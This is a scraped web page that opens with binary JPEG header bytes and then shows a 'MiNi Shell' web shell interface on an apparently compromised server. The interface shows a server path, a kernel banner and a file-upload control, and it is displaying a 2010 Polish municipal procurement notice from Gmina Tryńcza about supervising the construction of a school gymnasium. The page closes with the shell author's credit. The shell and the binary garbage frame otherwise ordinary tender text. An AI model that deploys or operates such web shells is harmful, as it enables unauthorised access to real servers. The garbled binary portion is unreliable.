JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100521/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100521/139986-N-2010.html

<p class="kh_header"><b>Tryńcza: Pełnienie nadzoru inwestorskiego przy budowie sali gimnastycznej z łącznikiem do budynku Szkoły Podstawowej w Gorzycach.</b><br>
<b>Numer ogłoszenia: 139986 - 2010; data zamieszczenia: 21.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tryńcza , Tryńcza 127, 37-204 Tryńcza, woj. podkarpackie, tel. 016 6421221, faks 016 6421221.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tryncza.itl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego przy budowie sali gimnastycznej z łącznikiem do budynku Szkoły Podstawowej w Gorzycach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na pełnieniu funkcji nadzoru inwestorskiego w specjalności m.in. budowlanej, wod-kan, c.o., gaz, elektrycznej, lub równoważne.  
(CPV-74262000-3 - usługi nadzoru budowlanego) podczas realizacji następującej inwestycji : Budowa sali gimnastycznej z łącznikiem do budynku szkoły podstawowej w Gorzycach, której realizacja może być współfinansowana ze środków zewnętrznych, unijnych.    
1. Do obowiązków Wykonawcy należeć będzie w szczególności:
1.1.Udział w opracowywaniu : 
     - specyfikacji istotnych warunków zamówienia, 
     - wyjaśnień do zapytań od Wykonawców do specyfikacji istotnych warunków 
        zamówienia, w trakcie przeprowadzania procedury zamówień publicznych. 
1.2.Udział w pracach komisji przetargowej, w przypadku powołania przez 
     Zamawiającego (ocena złożonych ofert przetargowych pod względem 
     merytorycznym, technicznym i rachunkowym oraz sporządzenie pisemnej opinii 
     na ten temat). 
2. Nadzór nad prowadzonymi robotami budowlanymi w specjalności budowlanej 
    obejmującej także nadzór inwestorski w zakresie różnych specjalności m.in. 
    wod - kan, c.o. i gaz, elektrycznej, w tym:
2.1.Sprawowania funkcji nadzoru inwestorskiego w zakresie określonym przez art. 
     25 - 27 Ustawy z dnia 7 lipca 1994r. Prawo budowlane /jednolity tekst, Dz. U. 
     z 2006 r. Nr 156 poz. 1118 z póź. zm.). Obowiązki te będzie mogła pełnić 
     jedynie osoba posiadająca przygotowanie zawodowe oraz właściwe uprawnienia 
     do pełnienia tego rodzaju funkcji i będąca członkiem Polskiej Izby Inżynierów 
     Budownictwa.        
2.2.Udział w przekazaniu placu budowy wykonawcy robót.
2.3.Odbioru i zabezpieczenia przedmiotu umowy ze spisaniem protokołu odbioru 
     częściowego zadania inwestycyjnego w przypadku zaniechania dalszej jego 
     realizacji przez Zamawiającego.
2.4.Sprawdzenia pod względem formalnym, merytorycznym i rachunkowym faktur 
     składanych przez Wykonawcę robót, oraz uzgadnianie wydatków, kosztów 
     realizowanej inwestycji z Zamawiającym - Gminą Tryńcza.
2.5.Prowadzenie rady budowy co najmniej raz w miesiącu. 
2.6.Sporządzanie raportów w formie opisowej i dokumentacji fotograficznej 
     - comiesięcznej.
2.7.Uczestnictwa w naradach, spotkaniach, zebraniach, komisjach, sesjach, itp. 
     związanych z realizacją zadań, organizowanych przez Zamawiającego.
2.8.Dokonania czynności odbioru końcowego inwestycji lub jej odpowiedniej części 
     określonej w umowie z wykonawcą robót z udziałem przedstawicieli 
     Zamawiającego.
2.9.Rozliczenia finansowego robót w terminie 30 dni licząc od daty odbioru 
     końcowego robót.  
3.0.Udział w przeglądach gwarancyjnych i pogwarancyjnych wykonanej inwestycji. 
Podane w ofercie wynagrodzenie jest ryczałtowe i niezmienne do końca realizacji inwestycji. Zamawiający nie dopuszcza zatrudnienia podwykonawców do wykonania zamówienia. 
Planowany okres realizacji zadania :  - rozpoczęcie : czerwiec 2010 r. - zakończenie 31.12.2012 r. 
W celu prawidłowego sporządzenia oferty należy dokonać obowiązkowej wizji inwestycji w terenie,   koszt sporządzenia oferty i przeprowadzenia wizji terenowej leży po stronie Wykonawcy. 
Projekty budowlane zadania są do wglądu w siedzibie Zamawiającego tj. : 
Urząd Gminy Tryńcza, pok. Nr 4 - tel. (016) 642-12-21 w. 40. w dniach pracy Urzędu :poniedziałek, środa, czwartek i piątek od godz. 7 00 do 15 00, wtorek od godz. 8 00 do 16 00..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, iż przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy pzp, jeżeli zachodzi co najmniej jedna z następujących okoliczności : 
- w przypadku udzielenia, w okresie 3 lat od udzielenia zamówienia podstawowego, 
  dotychczasowemu wykonawcy usług, zamówień uzupełniających, stanowiących   
  nie więcej niż 50 % wartości zamówienia podstawowego i polegających na 
  powtórzeniu tego samego rodzaju zamówień, jeżeli zamówienie podstawowe   
  zostało udzielone w trybie przetargu nieograniczonego lub ograniczonego, 
  a zamówienie uzupełniające było przewidziane w ogłoszeniu o zamówieniu dla 
  zamówienia podstawowego i jest zgodne z przedmiotem zamówienia 
  podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.26.20.20-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości : 
    400,00 zł,  słownie: czterysta złotych 00/100 
3. Wadium może być wniesione w: 
a) w pieniądzu, sposób przekazania : przelewem na konto Zamawiającego : BS 
    Jarosław Filia w Tryńczy 29909600042005002128810001 z dopiskiem Nadzór 
    inwestorski przy budowie sali gimnastycznej z łącznikiem do budynku Szkoły 
    Podstawowej w Gorzycach.
    Za termin wniesienia wadium w formie pieniężnej zostanie uznana data i godzina 
    wpływu środków na rachunek Zamawiającego. 
b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy szczędnościowo 
    - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
c) w gwarancjach bankowych, 
d) w gwarancjach ubezpieczeniowych, 
e) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 
    pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
    Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.) 
4. Wadium wnosi się przed upływem terminu składania ofert, tj. do dnia  
    31.05.2010 r. do godz. 9:00.
5. Kopię dowodu uiszczenia wadium należy dołączyć do oferty, natomiast oryginał 
    wniesienia wadium w innej formie niż w pieniądzu należy złożyć w siedzibie 
    Zamawiającego - Urząd Gminy Tryńcza, 37 - 204 Tryńcza 127 - księgowość, 
    pokój nr 12 (I piętro). 
6. Zamawiający zwraca wadium zgodnie z przesłankami art.46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami : 
a) cena                      - znaczenie : 100 %           
Ad. a) : Punkty za cenę zostaną przyznane według kryterium wagowego : 
(Cn / Cb) x 100
gdzie : Cn - cena najniższa  Cb - cena badana</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy ubiegający się o udzielenie zamówienia winni dołączyć do oferty następujące dokumenty : 
1. Oświadczenie oferenta w trybie art. 22 i 24 ust. 1 - Ustawy z dnia 29 stycznia 
    2004 r. - Prawo zamówień publicznych - zał. nr 5, wg wzoru  
2. Wypełniony i podpisany formularz ofertowy - zał. nr 1, wg wzoru  
3. Parafowany przez upoważnionego wykonawcę i dołączony do oferty - Projekt 
    umowy - zał. nr 2, wg wzoru  
4. Wykaz wykonanych w okresie ostatnich 3 lat usług polegających na pełnieniu 
    nadzoru nad realizacją min. 1 inwestycji o charakterze i złożoności     
    porównywalnej z zakresem niniejszego zamówienia, z podaniem ich wartości, 
    przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów    
    potwierdzających, że usługi te zostały wykonane lub są wykonywane należycie 
    (listy referencyjne dotyczące każdego zadania), - zał. nr 3 w/g wzoru. 
5. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, a w 
    szczególności Odpowiedzialnych za świadczenie usług, wraz z informacjami na 
    temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia   
    niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez 
    nie czynności, oraz informacją o podstawie do dysponowania tymi 
    osobami - zał. nr 4, wg wzoru
    Do oferty należy dołączyć kopię uprawnień budowlanych branży budowlanej, 
    sanitarnej, elektrycznej oraz kopię aktualnego zaświadczenia o przynależności 
    do Polskiej Izby Inżynierów Budownictwa, - doświadczenie zawodowe 
    min. 3 lat.           
6. Oryginał lub kserokopia, poświadczona przez wykonawcę za zgodność 
    z oryginałem, aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy 
    wymagają wpisu do rejestru, w celu wskazania braku podstaw do wykluczenia 
    w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 
    miesięcy przed upływem terminu składania ofert, a w stosunku do osób 
    fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy.
    Wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania 
    ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.trncza.itl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Tryńcza; 37-203 Tryńcza, koszt SIWZ 12,20 brutto, lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2010 godzina 09:00, miejsce: Urząd Gminy Tryńcza; 37-204 Tryńcza, sekretariat pok. nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com